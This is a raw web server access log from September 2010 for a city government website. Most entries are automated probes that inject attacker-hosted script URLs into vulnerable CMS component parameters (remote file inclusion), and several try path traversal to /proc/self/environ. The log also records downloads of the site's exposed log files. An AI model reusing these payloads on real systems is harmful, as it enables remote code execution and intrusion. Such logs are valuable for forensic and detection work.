66.71.254.10 - - [01/Sep/2010:06:40:51 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://bye515.zoomshare.com/files/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "cityofarkadelphia.com"
174.142.75.205 - - [01/Sep/2010:06:41:24 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://60gp.ovh.net/~wielgoml/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
174.142.75.205 - - [01/Sep/2010:06:41:24 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://60gp.ovh.net/~wielgoml/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
81.18.72.41 - - [01/Sep/2010:06:41:48 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://bye515.zoomshare.com/files/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
81.18.72.41 - - [01/Sep/2010:06:41:49 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://bye515.zoomshare.com/files/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
62.152.60.110 - - [01/Sep/2010:06:43:29 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://bye515.zoomshare.com/files/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "cityofarkadelphia.com"
62.152.60.110 - - [01/Sep/2010:06:43:29 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://bye515.zoomshare.com/files/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "cityofarkadelphia.com"
213.185.128.150 - - [01/Sep/2010:06:44:02 -0700] "GET /logs/access_091201.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "cityofarkadelphia.com"
213.185.128.150 - - [01/Sep/2010:06:46:52 -0700] "GET /logs/access_091231.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "cityofarkadelphia.com"
207.46.204.239 - - [01/Sep/2010:06:52:02 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
79.1.76.73 - - [01/Sep/2010:07:06:52 -0700] "GET /logs/access_091201.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://127.0.0.1/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.1.76.73 - - [01/Sep/2010:07:06:52 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://127.0.0.1/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.1.76.73 - - [01/Sep/2010:07:06:53 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://127.0.0.1/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.202.2.34 - - [01/Sep/2010:07:13:59 -0700] "GET /logs/access_091201.log%20%20/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.202.2.34 - - [01/Sep/2010:07:13:59 -0700] "GET /logs/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.202.2.34 - - [01/Sep/2010:07:13:59 -0700] "GET /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.202.2.34 - - [01/Sep/2010:07:14:09 -0700] "GET /logs/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.202.2.34 - - [01/Sep/2010:07:14:09 -0700] "GET /logs/access_091201.log%20%20/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.202.2.34 - - [01/Sep/2010:07:14:09 -0700] "GET /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
217.26.112.1 - - [01/Sep/2010:07:15:34 -0700] "GET /logs/access_091201.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "cityofarkadelphia.com"
217.26.112.1 - - [01/Sep/2010:07:15:34 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "cityofarkadelphia.com"
217.26.112.1 - - [01/Sep/2010:07:15:34 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "cityofarkadelphia.com"
217.26.112.1 - - [01/Sep/2010:07:17:28 -0700] "GET /logs/access_091201.log%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "cityofarkadelphia.com"
79.1.76.73 - - [01/Sep/2010:07:17:52 -0700] "GET /logs/access_091201.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://127.0.0.1/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.152.60.110 - - [01/Sep/2010:07:20:40 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.adkinshorton.net/genealogy/pe1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.152.60.110 - - [01/Sep/2010:07:20:40 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.adkinshorton.net/genealogy/pe1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.152.60.110 - - [01/Sep/2010:07:20:40 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.adkinshorton.net/genealogy/pe1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.152.60.110 - - [01/Sep/2010:07:20:55 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.adkinshorton.net/genealogy/pe1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.152.60.110 - - [01/Sep/2010:07:20:55 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.adkinshorton.net/genealogy/pe1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.152.60.110 - - [01/Sep/2010:07:20:55 -0700] "GET /logs/access_091031.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.adkinshorton.net/genealogy/pe1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
212.223.162.135 - - [01/Sep/2010:07:21:02 -0700] "GET /logs/access_091031.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.adkinshorton.net/genealogy/pe1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
212.223.162.135 - - [01/Sep/2010:07:21:02 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.adkinshorton.net/genealogy/pe1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
212.223.162.135 - - [01/Sep/2010:07:21:06 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.adkinshorton.net/genealogy/pe1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
212.223.162.135 - - [01/Sep/2010:07:21:10 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.adkinshorton.net/genealogy/pe1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
212.223.162.135 - - [01/Sep/2010:07:21:10 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.adkinshorton.net/genealogy/pe1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
212.223.162.135 - - [01/Sep/2010:07:21:10 -0700] "GET /logs/access_091031.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.adkinshorton.net/genealogy/pe1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.152.60.110 - - [01/Sep/2010:07:21:18 -0700] "GET /logs/access_090601.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.adkinshorton.net/genealogy/pe1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.152.60.110 - - [01/Sep/2010:07:21:59 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.adkinshorton.net/genealogy/pe1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.152.60.110 - - [01/Sep/2010:07:21:59 -0700] "GET /logs/access_091031.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.adkinshorton.net/genealogy/pe1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.152.60.110 - - [01/Sep/2010:07:21:59 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.adkinshorton.net/genealogy/pe1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
212.223.162.135 - - [01/Sep/2010:07:23:14 -0700] "GET /logs/access_091231.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.adkinshorton.net/genealogy/pe1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.152.60.110 - - [01/Sep/2010:07:23:21 -0700] "GET /logs/access_091231.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.adkinshorton.net/genealogy/pe1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
109.104.76.61 - - [01/Sep/2010:07:29:20 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "cityofarkadelphia.com"
217.26.112.1 - - [01/Sep/2010:07:40:03 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "cityofarkadelphia.com"
217.26.112.1 - - [01/Sep/2010:07:40:03 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:01:13 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:01:13 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:01:13 -0700] "GET /logs/access_091231.log%20%20/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:01:15 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:01:15 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:01:15 -0700] "GET /logs/access_091231.log%20%20/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
91.215.216.30 - - [01/Sep/2010:08:03:58 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "cityofarkadelphia.com"
91.215.216.30 - - [01/Sep/2010:08:05:37 -0700] "GET /logs/access.log/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "cityofarkadelphia.com"
91.215.216.30 - - [01/Sep/2010:08:05:37 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "cityofarkadelphia.com"
91.215.216.30 - - [01/Sep/2010:08:05:37 -0700] "GET /logs/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "cityofarkadelphia.com"
200.118.164.106 - - [01/Sep/2010:08:07:38 -0700] "GET /logs/access_100531.log HTTP/1.1" 200 3145728 "http://www.google.com.co/url?sa=t&source=web&cd=10&ved=0CDkQFjAJ&url=http%3A%2F%2Fcityofarkadelphia.com%2Flogs%2Faccess_100531.log&rct=j&q=www.incesp.com&ei=OWp-TNizMcT38Abgy4TYAw&usg=AFQjCNFsVjEWkx2M0fzvipSSjSKHXjsnrA" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.2.8) Gecko/20100722 AskTbBCPA/3.8.0.12304 Firefox/3.6.8 ( .NET CLR 3.5.30729)" "cityofarkadelphia.com"
200.118.164.106 - - [01/Sep/2010:08:07:41 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.2.8) Gecko/20100722 AskTbBCPA/3.8.0.12304 Firefox/3.6.8 ( .NET CLR 3.5.30729)" "cityofarkadelphia.com"
66.96.90.70 - - [01/Sep/2010:08:10:03 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://cybernewbie.zoomshare.com/files/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.96.90.70 - - [01/Sep/2010:08:10:03 -0700] "GET /skin/zero_vote/error.php?dir=http://cybernewbie.zoomshare.com/files/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.96.90.70 - - [01/Sep/2010:08:10:05 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://cybernewbie.zoomshare.com/files/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.96.90.70 - - [01/Sep/2010:08:10:05 -0700] "GET /skin/zero_vote/error.php?dir=http://cybernewbie.zoomshare.com/files/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.96.90.70 - - [01/Sep/2010:08:10:22 -0700] "GET /skin/zero_vote/error.php?dir=http://cybernewbie.zoomshare.com/files/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.96.90.70 - - [01/Sep/2010:08:10:25 -0700] "GET /skin/zero_vote/error.php?dir=http://cybernewbie.zoomshare.com/files/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.206.58.218 - - [01/Sep/2010:08:10:50 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.tosiltosil.net/zero//skin/z_music_let_b/images/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.206.58.218 - - [01/Sep/2010:08:10:50 -0700] "GET /logs/access_100201.log%20%20///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.tosiltosil.net/zero//skin/z_music_let_b/images/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.206.58.218 - - [01/Sep/2010:08:10:50 -0700] "GET /logs///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.tosiltosil.net/zero//skin/z_music_let_b/images/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
207.46.204.239 - - [01/Sep/2010:08:12:41 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
195.206.58.218 - - [01/Sep/2010:08:13:54 -0700] "GET /logs/access_091031.log%20%20///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.tosiltosil.net/zero//skin/z_music_let_b/images/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:14:00 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:14:00 -0700] "GET /logs/access_091231.log/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:14:06 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.206.58.218 - - [01/Sep/2010:08:14:43 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.tosiltosil.net/zero//skin/z_music_let_b/images/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.206.58.218 - - [01/Sep/2010:08:14:43 -0700] "GET /logs///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.tosiltosil.net/zero//skin/z_music_let_b/images/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.206.58.218 - - [01/Sep/2010:08:14:43 -0700] "GET /logs/access_100201.log%20%20///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.tosiltosil.net/zero//skin/z_music_let_b/images/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
184.107.48.153 - - [01/Sep/2010:08:15:39 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.yscan.vtrain2u.com/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
184.107.48.153 - - [01/Sep/2010:08:15:40 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.yscan.vtrain2u.com/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
184.107.48.153 - - [01/Sep/2010:08:15:40 -0700] "GET /logs/access_091201.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.yscan.vtrain2u.com/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
184.107.48.153 - - [01/Sep/2010:08:15:56 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.yscan.vtrain2u.com/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
184.107.48.153 - - [01/Sep/2010:08:15:58 -0700] "GET /logs/access_091201.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.yscan.vtrain2u.com/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
184.107.48.153 - - [01/Sep/2010:08:15:58 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.yscan.vtrain2u.com/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.96.90.70 - - [01/Sep/2010:08:16:07 -0700] "GET /logs/access_100201.log//skin/zero_vote/error.php?dir=http://cybernewbie.zoomshare.com/files/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.96.90.70 - - [01/Sep/2010:08:16:07 -0700] "GET /skin/zero_vote/error.php?dir=http://cybernewbie.zoomshare.com/files/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.96.90.70 - - [01/Sep/2010:08:16:07 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://cybernewbie.zoomshare.com/files/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.96.90.70 - - [01/Sep/2010:08:16:10 -0700] "GET /logs/access_100201.log//skin/zero_vote/error.php?dir=http://cybernewbie.zoomshare.com/files/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.96.90.70 - - [01/Sep/2010:08:16:10 -0700] "GET /skin/zero_vote/error.php?dir=http://cybernewbie.zoomshare.com/files/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.96.90.70 - - [01/Sep/2010:08:16:10 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://cybernewbie.zoomshare.com/files/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.206.58.218 - - [01/Sep/2010:08:16:22 -0700] "GET /logs/access_091031.log%20%20///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.tosiltosil.net/zero//skin/z_music_let_b/images/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
193.252.6.171 - - [01/Sep/2010:08:17:50 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)" "cityofarkadelphia.com"
193.252.6.171 - - [01/Sep/2010:08:17:50 -0700] "GET /logs/access_100501.log HTTP/1.1" 200 6094848 "http://www.google.fr/search?q=filetype:log+passwd&hl=fr&client=firefox-a&hs=K4U&rls=org.mozilla:fr:official&prmd=fd&ei=CG5-TP-RApTNjAf97bnSDg&start=90&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.2; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)" "cityofarkadelphia.com"
193.252.6.171 - - [01/Sep/2010:08:17:53 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:19:55 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:19:55 -0700] "GET /logs/access_091231.log%20%20/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:19:55 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:20:17 -0700] "GET /logs/access_091231.log%20%20/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:20:17 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
97.74.198.126 - - [01/Sep/2010:08:20:17 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.241.102.51 - - [01/Sep/2010:08:21:52 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.froehlich.us/squid/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.241.102.51 - - [01/Sep/2010:08:21:52 -0700] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.froehlich.us/squid/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.241.102.51 - - [01/Sep/2010:08:21:52 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.froehlich.us/squid/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.201.60.20 - - [01/Sep/2010:08:21:56 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "cityofarkadelphia.com"
91.215.216.30 - - [01/Sep/2010:08:22:06 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "cityofarkadelphia.com"
209.68.2.156 - - [01/Sep/2010:08:23:41 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.motosports.lv/mambots/system/cid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "cityofarkadelphia.com"
209.68.2.156 - - [01/Sep/2010:08:23:41 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.motosports.lv/mambots/system/cid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "cityofarkadelphia.com"
209.68.2.156 - - [01/Sep/2010:08:23:56 -0700] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.motosports.lv/mambots/system/cid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "cityofarkadelphia.com"
195.206.58.218 - - [01/Sep/2010:08:24:53 -0700] "GET /logs/access_091201.log///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.tosiltosil.net/zero//skin/z_music_let_b/images/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
